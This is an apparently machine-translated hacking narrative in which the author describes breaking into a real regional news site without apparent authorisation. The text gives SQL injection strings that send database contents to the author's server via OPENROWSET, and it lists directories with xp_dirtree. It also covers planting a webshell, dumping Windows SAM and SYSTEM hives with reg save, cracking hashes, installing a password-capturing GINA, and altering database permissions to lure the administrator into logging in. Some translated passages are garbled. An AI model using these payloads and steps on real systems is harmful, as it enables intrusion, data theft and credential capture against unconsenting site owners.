Detect news sites in a certain area

 
Author: Difficulties

One day, a friend sent a URL to get a SHELL and open it. It is a news site.

At first glance, all of them are HTML static pages. It is estimated that they are similar to CMS programs. Only the background is dynamic, and the foreground is all static pages generated. So I copied WWWSCAN and began to scan the directory to see if I could scan the upload point. Because there are many dictionaries and WWWSCAN takes a long time, I started searching for injection points on GOOGLE at the same time. Use site: www.xxxxxx.com inurl: asp to search for all ASP files and test them one by one. During the test, it was found that the anti-injection program was used on the entire site, and some functions such as isnumeric were used separately for judgment. After a long period of manual detection, I finally found an insert injection point on a News Comment page. Enter a single quotation mark (') at the place where the comment is posted. An error is returned.

The SQL SERVER database is known from the error message.

Enter two single quotes "'' ":

The page returns normally, which may be a shot point.

After testing, we found that the following statements can be successfully injected:

"', 1)-sp_password"

Enter the preceding statement in the text box. The comment is sent successfully and no error occurs. Make sure this is a shot point. However, it is disgusting to use insert injection. Because the values clause does not allow any select statements, you can only use OPENROWSET to upload data back to the local machine to obtain the data. Before the injection, we need to determine the SQL SERVER version, the current user's permissions, the current database name, and whether the site database is separated.

Submit the following statements in sequence:

 

"', Cast (@ version as int), 2000)-sp_password", obtain the version information "Microsoft SQL Server 2005-8.00.2039 (Intel X86) May 3 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ", database: SQL SERVER 2 K
"', Cast (system_user as int),)-sp_password" to get the connection username "myxxxxxxer" of the current database, instead of SA.
"', Cast (ltrim (is_srvrolemember ('sysadmin') + 'A' as int),)-sp_password ", A syntax error is returned when the varchar value '0a' is converted to a column whose data type is int. This indicates that the current user is not a member of the sysadmin role.
"', Cast (ltrim (is_member ('db _ owner') + 'A' as int),)-sp_password ", A syntax error is returned when the varchar value '0a' is converted to a column whose data type is int. This is not a member of the db_owner role. It seems PUBLIC.
"', Cast (ltrim (is_member ('public') + 'A' as int),)-sp_password ", A syntax error occurs when "converting varchar value '1a 'To a column whose data type is int" is returned. ", It seems that the permission is only PUBLIC.
"', Cast (@ servername +' | + host_name () as int),)-sp_password ", the "syntax error occurred when converting nvarchar value 'gnrb-ZGGZW | xxxxxx' to a column with the Data Type of int" is returned, or the database is separated.
"', Cast (db_name () as int),)-sp_password", and the database name is "365NEWS"
The current situation is a 2 k database with PUBLIC permissions, and the site database is separated. First, OPENROWSET forwards data back to the backend and obtains WEBSHELL.

At this time, WWWSCAN has been completed, but it is depressing that it has not been scanned to the background address. Sweat. Ignore it first. Check the data in the database first. Maybe the table will store some addresses.

First, check whether the database can connect to the Internet. Use NC to listen to port 80 locally, and then execute "', 1); insert into OPENROWSET ('sqloledb ', '2017. 35. xxx. xx, 80'; 'xxx'; XXX', SELECT 1') select 1-sp_password"

The NC immediately responded and obtained the IP address of the database server.

Therefore, a local SQL SERVER is mounted, and then the following statement is executed in the local PUBS database to create a table. This table is used to receive data returned by the SERVER:

Create table op (value varchar (8000 ))

Then submit at the shooting point:

"', 222, 1); insert into OPENROWSET ('sqloledb', '100. 35. xxx. xx'; test'; '000000', 'select [value] FROM pubs .. op ') select name from sysobjects where xtype = 'u-sp_password"

Select * from op locally to obtain all the table names in the database. It is worth noting that the admin adminmsg users tables are useless data in other tables.

 

Submit again

"', 222, 1); insert into OPENROWSET ('sqloledb', '100. 35. xxx. xx'; test'; '000000', 'select [value] FROM pubs .. op ') select [name] from syscolumns where id = object_id ('admin')-sp_password"

The names of all fields in the admin adminmsg users table are obtained in a similar way.

Submit again

"', 222, 1); insert into OPENROWSET ('sqloledb', '100. 35. xxx. xx'; test'; '000000', 'select [value] FROM pubs .. op ') select [username] +' | '+ [password] from admin-sp_password"

The values in the admin and users tables are obtained in a similar way. All values are account and password, but they do not work now, because there is no background and the password is MD5 encrypted, many cannot be broken.

How to find the background is a problem. Here, adminmsg is a noteworthy table. From the table name, we can see that the message sent by the Administrator should be saved here, there should be a function for management personnel to communicate in the background, and all messages will exist in this table.

Maybe there are some sensitive things in it?

 

First use

"', 222, 1); insert into OPENROWSET ('sqloledb', '100. 35. xxx. xx'; test'; '000000', 'select [value] FROM pubs .. op ') select count (*) from adminmsg-sp_password"

Check the number of messages. There are more than one thousand messages. This means that the script may run out of time.

 

LIKE to perform fuzzy search and submit

"', 222, 1); insert into OPENROWSET ('sqlodb', '192. 35. xxx. xx'; 'test'; '123', 'select [value] FROM

Pubs.. op ') select top 100 cast (msgContent as varchar (8000) from adminmsg where msgContent like

'% Background address % '-"

Then, the query keyword is constantly changed, and sensitive data is obtained from the adminmsg table. The system tries "background", "password", "admin", and "login. keywords such as asp, upfile, and upload are obtained from the table, for example:

Some backend management addresses are found, but these addresses are all sub-stations, and most of them are either invalid or none of the functions are available after they are entered. This is depressing.

I can't directly access the master site. Check if I can win the database server. I got the IP address of the database server when I sent the data back. I scanned the NMAP and found that 80 was enabled, I found a sub-station on the database server. Let's take the SHELL of this substation first.

 

Run the command in the local PUBS Library first.

"Create table dir (n varchar (200), d int, f int );"

 

Submit the following statement to start the column directory and check whether there are any files available on the substation:

"', 200, 1); create table # dir (n varchar (), d int, f int); insert into # dir exec master .. xp_dirtree

'C: ', 222; insert into OPENROWSET ('sqlodb', '192. 35. xxx. xx'; 'test'; '123', 'select * FROM

Pubs.. dir') select * from # dir; drop table # dir-sp_password"

 

After a long period of time, I finally found an ASP-format ACCESS database, and then found a write operation page for the database. I wrote a sentence in it and successfully obtained the WEBSHELL, which is easier to escalate permissions, after entering, 360EXP is taken to the server:

After obtaining the database server, I found that it is not the same CIDR block as the master site.

 

Therefore, first collect information on the database server.

I installed PCANYWHERE on the server, found two CIF files, and obtained two passwords. It seems that the main site has opened PCANYWHERE. I tried it and connected it with one of the CIF passwords, however, the master Site Server is locked and cannot be used.

 

Continue to collect information on the database server. However, this server seems to be relatively clean, except for the ASP and HTML of the handler, nothing else.

 

MCAFEE is installed on the server, and all the items such as PWDUMP uploaded are killed. MCAFEE cannot stop without a password.

You can only manually capture the HASH and use the following code:

Reg save hklmsam sam. hive

Reg save hklmsystem system. hive

Reg save hklmsecurity security. hive

 

The HASH information in the registry is exported, and the three files are downloaded back to the local machine and imported to CAIN. The HASH information on the database server is obtained:

However, the HASH values of accounts in several administrator groups are all ADD3, which cannot be cracked. After obtaining the plain text passwords of several other accounts and combining the background passwords saved in the database, I tried to log on to the server on the master site. The result still failed.

You can only type one GINA and wait for the Administrator to log on. For MCAFEE reasons, the GINA in your hand is not killed, but not for other reasons. Finally, I found a GINA written by LZX in the Forum and planted it successfully. Then quietly wait for the Administrator to log on.

 

After four or five days of login, I sent an email to them reminding them that their servers had been intruded. They didn't handle the problem. I sweated.

So I connected the SQL SERVER on the database SERVER and removed the select and update permissions of all users in the tables admin and users. For example:

 

 

Now the main station background should be unable to log on. If you want to log on to the server, find the reason.

 

This action is really effective. after about three or four hours, the Administrator logged on to the server and successfully recorded a 22-bit pure digital password, which is a combination of two mobile phone numbers. With these two phone numbers, I rushed to the master station server again and failed again. It is still not possible to change the password combination with the previous ones. The idea gets stuck here and I don't know how to proceed.

 

In this case, it may take more than ten days. I decided to try again.

Now we have a new idea. In fact, as long as we find the background of the Main Station, it will be much better than now.